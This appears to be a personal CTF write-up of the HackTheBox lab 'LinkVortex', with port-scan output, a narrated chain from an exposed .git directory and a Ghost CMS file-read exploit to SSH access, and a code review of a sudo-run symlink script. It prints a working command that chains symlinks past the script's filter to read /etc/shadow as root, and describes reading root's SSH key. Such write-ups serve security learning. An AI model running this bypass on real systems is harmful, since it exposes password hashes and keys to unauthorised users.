root💀senseicat:~#
Hack. Eat. Sleep. Repeat!!!
Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham
CTF-: Hackthebox
Lab-: LinkVortex
- Rustscan’s output
❯ rustscan -a linkvortex.htb -- -Pn -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/sensei/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.47:22
Open 10.10.11.47:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p ")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 05:04 WAT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:04, 0.00s elapsed
Initiating Connect Scan at 05:04
Scanning linkvortex.htb (10.10.11.47) [2 ports]
Discovered open port 22/tcp on 10.10.11.47
Discovered open port 80/tcp on 10.10.11.47
Completed Connect Scan at 05:04, 0.21s elapsed (2 total ports)
Initiating Service scan at 05:04
Scanning 2 services on linkvortex.htb (10.10.11.47)
Completed Service scan at 05:04, 6.47s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.47.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:04
Completed NSE at 05:05, 7.10s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:05
Completed NSE at 05:05, 0.87s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:05
Completed NSE at 05:05, 0.00s elapsed
Nmap scan report for linkvortex.htb (10.10.11.47)
Host is up, received user-set (0.22s latency).
Scanned at 2025-02-23 05:04:49 WAT for 15s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
| 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
80/tcp open http syn-ack Apache httpd
| http-methods:
|_ Supported Methods: POST GET HEAD OPTIONS
|_http-generator: Ghost 5.58
|_http-server-header: Apache
| http-robots.txt: 4 disallowed entries
|_/ghost/ /p/ /email/ /r/
|_http-favicon: Unknown favicon MD5: A9C6DBDCDC3AE568F4E0DAD92149A0E3
|_http-title: BitByBit Hardware
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Subdomain enumeration-:
- I discovered a git directory after fuzzing the
devsubdomain.
- I recovered the
.gitdirectory with this GitHacker tool.
- I grepped for credentials and discovered a password.
- I guessed the email which I presumed should be “admin@linkvortex.htb” which worked.I am logged in as the admin.
- The dockerfile in the git repo showed the version of the ghost cms.
- This version of Ghost cms is vulnerable to
Arbitrary File Read.I discovered an exploit here.I read file/etc/passwd.
- Then,I noticed a config file provided in the
Dockerfilewhich might contain necessary credentials.
- I sshed to the server with the credentials.
Privesc with Symlink
- I ran
sudo -land spotted a rule that allows userbobto run a bash script as root.
Code Review of the sh file
- File-:
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
/usr/bin/echo "! First argument must be a png file !"
exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
LINK_NAME=$(/usr/bin/basename $LINK)
LINK_TARGET=$(/usr/bin/readlink $LINK)
if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
/usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
/usr/bin/unlink $LINK
else
/usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
/usr/bin/mv $LINK $QUAR_DIR/
if $CHECK_CONTENT;then
/usr/bin/echo "Content:"
/usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
fi
fi
fi
- The script set a directory
/var/quarantinedto variableQUAR_DIRand checks if the variableCHECK_CONTENTis set and if it is not set, it sets it booleanfalse. Then variableLINKis set to the first argument.TheLINKvariable must end with.pngwhich means it must be a png file.
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
/usr/bin/echo "! First argument must be a png file !"
exit 2
fi
- The last part of the code check if the file is a symbolic link and it exists with
test -land sets the variableLINK_NAMEto the basename withbasename <filename>and theLINK_TARGETholds the file which the symbolic link points to.Lastly,it checks if the symlink contains stringetcorrootto prevent attackers from reading critical files.If the first condition is not fulfilled, theelsestatement move the file to/var/quarantinedand if variable$CHECK_CONTENTis settrue, the file gets read.
if /usr/bin/sudo /usr/bin/test -L $LINK;then
LINK_NAME=$(/usr/bin/basename $LINK)
LINK_TARGET=$(/usr/bin/readlink $LINK)
if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
/usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
/usr/bin/unlink $LINK
else
/usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
/usr/bin/mv $LINK $QUAR_DIR/
if $CHECK_CONTENT;then
/usr/bin/echo "Content:"
/usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
fi
fi
fi
Exploiting it
- I created a symlink for file
/etc/shadowin the home directory.
- Then,in another directory,we have to create a symlink to point to our former symlink so that
readlinkwill not spot that we are trying to read/etc/shadowand exit the script.You can see in the image that it does not point to the original file which is/etc/shadowbut binarycatwill read the file.
- Before we execute the script,an env variable
CHECK_CONTENTmust be created and set totruewithexport.
cd ~;ln -s /etc/shadow /home/bob/tpassz.txt;cd /tmp;ln -s /home/bob/tpassz.txt /tmp/rootz.png;
export CHECK_CONTENT=true;sudo -u root /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
- I read the id_rsa file and got root access.
- Root access-: